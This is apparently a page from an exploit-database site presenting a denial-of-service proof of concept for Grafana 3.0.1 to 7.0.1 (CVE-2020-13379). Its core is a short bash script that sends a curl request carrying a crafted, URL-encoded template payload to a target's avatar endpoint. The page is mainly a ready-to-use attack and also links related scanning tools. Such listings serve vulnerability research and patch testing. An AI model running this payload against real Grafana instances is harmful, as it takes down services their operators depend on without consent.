Search for hundreds of thousands of exploits

"Grafana 7.0.1 - Denial of Service (PoC)"

Author

Exploit author

mostwanted002

Platform

Exploit platform

linux

Release date

Exploit published date

2020-07-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# Exploit Title: Grafana 7.0.1 - Denial of Service (PoC)
# Date: 2020-05-23
# Exploit Author: mostwanted002
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 3.0.1 - 7.0.1
# Tested on: Linux
# CVE : CVE-2020-13379

#!/bin/bash

if [[ $1 != "" ]]; then
    curl -I "${1}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D"
else
    echo "Usage: grafana-dos.sh <TARGET>.   Example: grafana-dos.sh http://localhost:3000"
fi
Release DateTitleTypePlatformAuthor
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48638/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.